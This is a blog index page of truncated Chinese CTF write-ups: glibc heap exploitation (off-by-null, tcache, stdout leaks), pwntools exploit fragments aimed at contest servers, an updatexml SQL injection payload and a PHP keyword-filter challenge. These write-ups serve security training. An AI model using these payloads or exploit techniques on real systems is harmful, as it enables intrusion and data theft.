SkYe231 Blog

iNote漏洞点edit 功能当写入 chunk size 长度的数据时，会造成 off by null 思路题目基于 libc2.27 ，仅有 off by null 一个漏洞。 填满 tcache 之后，将堆释放到 fastbin ，输入长字符串利用 scanf 触发 malloc 大堆块将 fastbin 整理到 unsortedbin ，泄露出 libc 地址 利用 offbynull 向前unlink合并将 prev_inuse 控制为 0 ，结合伪造 header 、offbynull 向后unlink制造堆重叠 输入长字符串利用 scanf 触发 malloc_consolidate ： 1234567891011121314151617181920#step0:unsortedbin泄露libc地址for i in range(8): add(i,0x78)add(8,0x58)#后面offbynull构造0x110add(9,0x20)#后面offbynull构造0x110for i in list(range(8)): delete(i)p.se ...

coverMain 函数有一个任意地址写入 1 字节漏洞： 同时程序留有后门函数： 利用任意地址写入一字节，修改 puts plt 表 jmp 部分汇编，跳转到 system 函数： EXP123456789101112131415161718192021from pwn import *context.log_level='debug'context.terminal=['tmux','sp','-h']# p = process("./pwn")p = remote("118.190.62.234",12435)elf = ELF("./pwn")libc = ELF("/lib/i386-linux-gnu/libc.so.6")# gdb.attach(p,"b *0x0804875D")# raw_input()p.recvuntil("Try use a bullet to pw ...

做题目遇到的两种 eof 信号需求情况： 发送 eof 之后，后续不需要继续输入（vnctf-White-Give-Flag） 发送 eof 之后，后续还需要继续输入（mtctf-blind） eof 发送后继续输入不用 mtctf-blind 做例子，因为利用 eof 绕过第一层之后，由于题目其他方面而无法 getshell ，用一个 demo 例子（来源）代替： 1234567891011121314#include <stdio.h>#include <stdlib.h>#include <string.h>int main(void) { char buf[24]; while(1) { if(read(0,buf,16)==0) { break; } } read(0,buf,1000); return 0;} 题目要求第一个 read 返回值为 0 ，也就是输入字符串长度为 0 ，才能到达下面的 read 栈溢出漏洞。 ...

baby_focalglibc 2.31 ，没有 PIE ，没有输出功能，开沙盒的堆溢出： 没有输出功能思路基本都是攻击 stdout 泄露出 libc 地址，这条题目分配函数用的是 calloc ，相当于没有 tcache 存在的，攻击思路和 glibc 2.23 一样。然后就是利用 free_hook 栈迁移到堆上的 orw 。 思路 填满 tcache 之后，利用堆溢出形成堆重叠，形成两个指向同一个地址的指针。注意需要在第一个 unsortedbin 前面布置一个堆，用来修改 size 来绕过保护。 两个同一地址的指针，在 fastbin 写入 main_arena_xx 地址，爆破 1/16 到 stdout 上方，利用错位构造出符合 fastbin 的 size 位。 这篇文章末尾中有提及：http://blog.eonew.cn/archives/1190 修复 unsortedbin 恢复分配释放功能。利用堆溢出劫持 fastbin fd 指针将堆分配到堆指针数组（需要提前布置 size 绕过保护），实现任意地址写。 将 free_hook 劫持为 puts ...

5cef23f373e591f73b0780f44e533ed0d3ed819ed94539aacbd49d448d83d203c86138188432ed081fb96647b11f4e3a368dbff21a107c0bf56a84e883b9e9e33008f6937bc89ddf2c43515884639c17b16be8fc8d7c60ab3918a7666f8afbdfd6ef22afa6448ec5230e4cbdb205b443dc1dce78bc1f81489eb2b8689922cc7ffcfa01b6870f03609a33ebed6664c0c9c091c5067672323ad3d5093313f6da15edc0464f67f35418be11e4d2bd27518f430de355636dfb2ad3ea81d4b2c0892aaa2a5f82c5966cbfdc30f29fb4152022511dae302e9ee3fc12b9589ca31fd55efaf2500ada4f88ae175f93a3366819c72dbf1cc7ddf26ebfa ...

两个题目都是无输出堆题，最近一次比赛在 nepctf 遇到：https://www.mrskye.cn/archives/bdb75c49/#sooooeasy 思路方法概述：https://www.jianshu.com/p/fe28639e406e BabyNote题目是基于 glibc 2.31 的菜单堆题。 漏洞出现在 free 之后没有置零指针导致的 UAF ： 程序没有输出函数，倒是有一个提示的函数 gift 函数，输出堆地址最低两个字节，没用明白，到最后也不关他的事情。 思路： 利用 tcache double 和 scanf 输出长字符串触发 malloc_consolidate 获取 main_arena 地址 爆破倒数第四个数字，将堆分配到 stdout 结构体上，修改 flag 和 write_base 地址泄露出 libc 地址 利用 tcache dup get shell 遇到的问题就是直接之前 libc 2.23 的 payload 去打的话没有回显出 libc 地址，原来的 payload ： 1p64(0x0FBAD1887) +p64 ...

Webeasy_sql单引号直接报错，试了一下updatexml直接可以报错注入了。 注到表名时过滤了information以及其他等效替代的表，测了一下有flag表，然后就开始无列名注入了。 1uname=admin&passwd=123') or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id))c),0x7e),1)) %23&Submit=%E7%99%BB%E5%BD%95 注出来前两个字段为id跟no，注出来flag位于40b380c6-1208-4216-b5a8-1f550a5a8be4。 1uname=admin&passwd=123') or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id ...

M781234567891011121314151617181920212223from pwn import *context.log_level = 'debug'context.terminal = ['tmux','sp','-h']# p = process("./M78")p = remote("39.96.88.40",7010)libc = ELF("/lib/i386-linux-gnu/libc.so.6")elf = ELF("./M78")p.sendlineafter('?','1')p.recvuntil("building\n")p.send('a'*25)p.recvuntil("password\n")# gdb.attach(p,"b *0x080492B0")payload ...

easypwn新建的堆块时，存在 off by one phone number 和 name 写入函数使用的是 scanf 。scanf 是危险函数，可以一直输入直到遇到 \n 。 指针存放地址在 name 后面，可以通过溢出修改指针地址。 EXP123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657from pwn import *context.log_level = 'debug'context.terminal = ['tmux','sp','-h']def cmd(cmd): p.recvuntil(">>") p.sendline(str(cmd))def add(number,name,size,des): cmd(1) p.sendlineafter("numbe ...

Webfind_it.1ndexx.php.swp 源码： 12345678910111213141516171819202122232425<?php#Really easy...$file=fopen("flag.php","r") or die("Unable 2 open!");$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));$hack=fopen("hack.php","w") or die("Unable 2 open");$a=$_GET['code'];if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\ ...